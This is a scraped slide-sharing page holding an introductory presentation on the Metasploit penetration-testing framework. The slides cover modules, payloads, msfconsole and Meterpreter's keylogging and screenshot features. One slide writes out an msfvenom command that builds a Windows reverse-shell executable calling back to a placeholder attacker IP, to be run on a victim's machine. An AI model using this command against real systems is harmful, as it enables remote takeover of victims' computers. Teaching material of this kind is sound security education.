AM
Uploaded byAshok Reddy Medikonda
PPTX, PDF989 views

Metasploit framework in Network Security

Metasploit is an open source framework for penetration testing that allows users to perform vulnerability scanning, exploit development, and post-exploitation. It provides tools for information gathering, vulnerability scanning, pre-exploitation and post-exploitation tasks. Metasploit has modules for exploits and payloads that are used together, with payloads being the code executed on the target and encoders ensuring payloads reach their destination. The msfconsole interface provides centralized access to Metasploit's options like finding vulnerabilities through open ports and setting the listener, payload, and target for exploitation. Meterpreter is an advanced payload included in Metasploit that has additional features for tasks like keylogging and taking screenshots.

Embed presentation

Downloaded 21 times
Metasploit
Metasploit • Metasploit is an open source, freely available framework that is used by professionals. • For vulnerability scanning & penetration testing. • Development of exploits, Payloads.
Why Metasploit ? • It provides the end to end framework for penetration testing • Information gathering • Vulnerability scanning • Pre & post Exploitation • Exploit Development
METASPLOIT ARCHITECTURE MODULES AND LOCATIONS Exploits •Defined as modules that use payloads •An exploit without a payload is an Auxiliary module Payloads, Encoders, Nops •Payloads consist of code that runs remotely •Encoders ensure that payloads make it to their destination •Nops keep the payload sizes consistent Primary ModuleTree •Located under /usr/share/metasploit-framework/modules/
Vulnerability The word vulnerability, in computer security, refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability EXPLOIT =Vulnerability + Payload;
MSF Console • The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “allin-one” centralized console and allows you efficient access to virtually all of the options available in the MSF. • To find the vulnerabilities like open ports, reverse tcp ports.
MSF console
MSF options
Setting LHOST & LPORT
Set payload • Set payload windows/meterpreter/reverse_tcp • Meterpreter and shell • The meterpreter is simply an advanced payload(stages) included in the metasploit framwork. It is an extensible payload with a lot of features, like it can be used for key logging, getid, snapshots from remote desktop when connected.
Exploiting Windows • The concept of exploiting a vulnerability on Linux or Windows OS remains same. • For this we need “MSFVENOM” to generate an executable with specific options and payload that can be executed in victim’s system • COMMAND • Msfvenom -p windows/Meterpreter/reverse_shell LHOST=<Attackers IP> LPORT = < Attackers port> -f exe /usr/bin/shell.exe • -p for specific payload used • -f for which foemat using exe, pdf.
Meterpreter
ThankYou

More Related Content

PPTX
Metasploit
byLalith Sai
 
PPTX
Introduction to Metasploit
byGTU
 
PDF
Introduction to Metasploit
byHossein Yavari
 
PPTX
Metasploit
byInstitute of Information Security (IIS)
 
PPTX
Metasploit framwork
byDeepanshu Gajbhiye
 
PPTX
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
PPTX
Metasploit
byhenelpj
 
PDF
Metaploit
byAjinkya Pathak
 
Metasploit
byLalith Sai
 
Introduction to Metasploit
byGTU
 
Introduction to Metasploit
byHossein Yavari
 
Metasploit
byInstitute of Information Security (IIS)
 
Metasploit framwork
byDeepanshu Gajbhiye
 
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
Metasploit
byhenelpj
 
Metaploit
byAjinkya Pathak
 

What's hot

PPTX
Finalppt metasploit
bydevilback
 
PPTX
Vulnerability assessment and penetration testing
byAbu Sadat Mohammed Yasin
 
PPTX
Metasploit seminar
byhenelpj
 
PDF
Fantastic Red Team Attacks and How to Find Them
byRoss Wolf
 
PPTX
Spyware and rootkit
byNikhil Pandit
 
PPTX
Burp suite
bySOURABH DESHMUKH
 
PPTX
Crowdstrike .pptx
byuthayakumar174828
 
PPTX
Penetration testing reporting and methodology
byRashad Aliyev
 
PPTX
Pen Testing Explained
byRand W. Hirt
 
PPTX
Kali Linux
byChanchal Dabriya
 
PDF
Endpoint Detection & Response - FireEye
byPrime Infoserv
 
PPTX
Burpsuite 101
byn|u - The Open Security Community
 
PDF
MITRE ATT&CK Framework
byn|u - The Open Security Community
 
PDF
Android Security & Penetration Testing
bySubho Halder
 
PPT
Keyloggers and Spywares
byAnkit Mistry
 
PDF
Hacking With Nmap - Scanning Techniques
byamiable_indian
 
PPTX
PowerShell for Practical Purple Teaming
byNikhil Mittal
 
PDF
Computer Security and Intrusion Detection(IDS/IPS)
byLJ PROJECTS
 
PDF
Nmap Hacking Guide
byAryan G
 
PPT
All about Hacking
byMadhusudhan G
 
Finalppt metasploit
bydevilback
 
Vulnerability assessment and penetration testing
byAbu Sadat Mohammed Yasin
 
Metasploit seminar
byhenelpj
 
Fantastic Red Team Attacks and How to Find Them
byRoss Wolf
 
Spyware and rootkit
byNikhil Pandit
 
Burp suite
bySOURABH DESHMUKH
 
Crowdstrike .pptx
byuthayakumar174828
 
Penetration testing reporting and methodology
byRashad Aliyev
 
Pen Testing Explained
byRand W. Hirt
 
Kali Linux
byChanchal Dabriya
 
Endpoint Detection & Response - FireEye
byPrime Infoserv
 
Burpsuite 101
byn|u - The Open Security Community
 
MITRE ATT&CK Framework
byn|u - The Open Security Community
 
Android Security & Penetration Testing
bySubho Halder
 
Keyloggers and Spywares
byAnkit Mistry
 
Hacking With Nmap - Scanning Techniques
byamiable_indian
 
PowerShell for Practical Purple Teaming
byNikhil Mittal
 
Computer Security and Intrusion Detection(IDS/IPS)
byLJ PROJECTS
 
Nmap Hacking Guide
byAryan G
 
All about Hacking
byMadhusudhan G
 

Similar to Metasploit framework in Network Security

PPTX
Metasploit
byParth Sahu
 
PPTX
Metasploit (Module-1) - Getting Started With Metasploit
byAnurag Srivastava
 
PDF
Metasploit Demo
byn|u - The Open Security Community
 
PPTX
Intro to exploits in metasploitand payloads in msfvenom
bySiddharth Krishna Kumar
 
PPTX
Metasploit - Basic and Android Demo
byArpit Agarwal
 
PPTX
Metasploit
bypenetration Tester
 
PPT
Automated Penetration Testing With The Metasploit Framework
byTom Eston
 
PPTX
Introduction to metasploit
byGTU
 
PPTX
Introduction to Metasploit-Foundation.pptx
byMakaraLong
 
PPTX
Metasploit Framework and Payloads supported
bySwapnil Gharat
 
PDF
Metasploit Computer security testing tool
bymedoelkang600
 
PPTX
Introduction of Metasploit and task.pptx
byhira11ahmed02
 
PPTX
BSides Algiers - Metasploit framework - Oussama Elhamer
byShellmates
 
PPT
Meta sploit (cyber security)
byRajal Patel
 
PPTX
Pentesting with linux
byHammad Ahmed Khawaja
 
PPTX
talks about Metasploit.pptx
byxigexo6436
 
PDF
Metasploit primary
byn|u - The Open Security Community
 
PDF
Metasploitation part-1 (murtuja)
byClubHack
 
PDF
24 33 -_metasploit
bywozgeass
 
DOCX
Backtrack Manual Part6
byNutan Kumar Panda
 
Metasploit
byParth Sahu
 
Metasploit (Module-1) - Getting Started With Metasploit
byAnurag Srivastava
 
Metasploit Demo
byn|u - The Open Security Community
 
Intro to exploits in metasploitand payloads in msfvenom
bySiddharth Krishna Kumar
 
Metasploit - Basic and Android Demo
byArpit Agarwal
 
Metasploit
bypenetration Tester
 
Automated Penetration Testing With The Metasploit Framework
byTom Eston
 
Introduction to metasploit
byGTU
 
Introduction to Metasploit-Foundation.pptx
byMakaraLong
 
Metasploit Framework and Payloads supported
bySwapnil Gharat
 
Metasploit Computer security testing tool
bymedoelkang600
 
Introduction of Metasploit and task.pptx
byhira11ahmed02
 
BSides Algiers - Metasploit framework - Oussama Elhamer
byShellmates
 
Meta sploit (cyber security)
byRajal Patel
 
Pentesting with linux
byHammad Ahmed Khawaja
 
talks about Metasploit.pptx
byxigexo6436
 
Metasploit primary
byn|u - The Open Security Community
 
Metasploitation part-1 (murtuja)
byClubHack
 
24 33 -_metasploit
bywozgeass
 
Backtrack Manual Part6
byNutan Kumar Panda
 

Recently uploaded

PPT
Lecture_3 Network Securityeyeyggegeg.ppt
bysawsan202
 
PPT
Lecture_3 Network Securityyyeyeyyeeyyeywy.ppt
bysawsan202
 
PPTX
Role of VMware and Cloud Computing in CyberSecurity.pptx
byalehanoor1325
 
PPTX
Types of Cryptograph Symmetric Ceaser cipher and also about Assymetric
byhamzaabdulqadeer11
 
PPTX
CaseStudy-CloudMigration -For USE CASE -Customer Success Info -6-Aug-25.pptx
bywinlentech
 
PPTX
Computer Networks 01[1 using all terms].pptx
bywaqasahmedbhatti633
 
PPTX
BIG DATA it is talking about the big data.pptx
byAbhishekGarg269
 
PPT
Memory Organization In Assembly Language
byumairmuhammad0409
 
PDF
Design For Test - Getting Test Automation value from Design Expressions.
byDavid Harrison
 
PDF
Xnspy vs FlexiSPY: 2025 Monitoring Comparison
byMichael Carter
 
PDF
ARTIFICIAL INTELLIGENCE DEVELOPMENT SERVICE
bydavidjohansen1597
 
PDF
Here are the winners of KALIDASA SAMMAN.
byglcppro
 
PPTX
SriLank SLT LTE Network Sharing V2.pptx
bynthuang
 
PDF
tokiohotellistening.pdf for tokiohotelfans
byrafaelgombos1234
 
PDF
Top 5 Snapchat Tracker Apps for Safe and Responsible Monitoring
byMichael Carter
 
PPT
html-forms in web development-courseICT.
bymadz33
 
PPTX
Bibhav Singh.pptx it's very useful for us it's in very good and very nice
byabhishekjaiswal5th33
 
PPTX
PRITHVI theater, A true artist. Newzfeaturez.pptx
bysc05digital
 
PPTX
Computer Science Degree for College .pptx
byHanenek1
 
PPTX
Ideathon template.pptx it is a ideathon template
bykonav71133
 
Lecture_3 Network Securityeyeyggegeg.ppt
bysawsan202
 
Lecture_3 Network Securityyyeyeyyeeyyeywy.ppt
bysawsan202
 
Role of VMware and Cloud Computing in CyberSecurity.pptx
byalehanoor1325
 
Types of Cryptograph Symmetric Ceaser cipher and also about Assymetric
byhamzaabdulqadeer11
 
CaseStudy-CloudMigration -For USE CASE -Customer Success Info -6-Aug-25.pptx
bywinlentech
 
Computer Networks 01[1 using all terms].pptx
bywaqasahmedbhatti633
 
BIG DATA it is talking about the big data.pptx
byAbhishekGarg269
 
Memory Organization In Assembly Language
byumairmuhammad0409
 
Design For Test - Getting Test Automation value from Design Expressions.
byDavid Harrison
 
Xnspy vs FlexiSPY: 2025 Monitoring Comparison
byMichael Carter
 
ARTIFICIAL INTELLIGENCE DEVELOPMENT SERVICE
bydavidjohansen1597
 
Here are the winners of KALIDASA SAMMAN.
byglcppro
 
SriLank SLT LTE Network Sharing V2.pptx
bynthuang
 
tokiohotellistening.pdf for tokiohotelfans
byrafaelgombos1234
 
Top 5 Snapchat Tracker Apps for Safe and Responsible Monitoring
byMichael Carter
 
html-forms in web development-courseICT.
bymadz33
 
Bibhav Singh.pptx it's very useful for us it's in very good and very nice
byabhishekjaiswal5th33
 
PRITHVI theater, A true artist. Newzfeaturez.pptx
bysc05digital
 
Computer Science Degree for College .pptx
byHanenek1
 
Ideathon template.pptx it is a ideathon template
bykonav71133
 

Metasploit framework in Network Security

  • 1.
  • 2.
    Metasploit • Metasploit isan open source, freely available framework that is used by professionals. • For vulnerability scanning & penetration testing. • Development of exploits, Payloads.
  • 3.
    Why Metasploit ? •It provides the end to end framework for penetration testing • Information gathering • Vulnerability scanning • Pre & post Exploitation • Exploit Development
  • 4.
    METASPLOIT ARCHITECTURE MODULES ANDLOCATIONS Exploits •Defined as modules that use payloads •An exploit without a payload is an Auxiliary module Payloads, Encoders, Nops •Payloads consist of code that runs remotely •Encoders ensure that payloads make it to their destination •Nops keep the payload sizes consistent Primary ModuleTree •Located under /usr/share/metasploit-framework/modules/
  • 5.
    Vulnerability The word vulnerability,in computer security, refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability EXPLOIT =Vulnerability + Payload;
  • 6.
    MSF Console • Themsfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “allin-one” centralized console and allows you efficient access to virtually all of the options available in the MSF. • To find the vulnerabilities like open ports, reverse tcp ports.
  • 7.
  • 8.
  • 9.
  • 10.
    Set payload • Setpayload windows/meterpreter/reverse_tcp • Meterpreter and shell • The meterpreter is simply an advanced payload(stages) included in the metasploit framwork. It is an extensible payload with a lot of features, like it can be used for key logging, getid, snapshots from remote desktop when connected.
  • 11.
    Exploiting Windows • Theconcept of exploiting a vulnerability on Linux or Windows OS remains same. • For this we need “MSFVENOM” to generate an executable with specific options and payload that can be executed in victim’s system • COMMAND • Msfvenom -p windows/Meterpreter/reverse_shell LHOST=<Attackers IP> LPORT = < Attackers port> -f exe /usr/bin/shell.exe • -p for specific payload used • -f for which foemat using exe, pdf.
  • 12.
  • 13.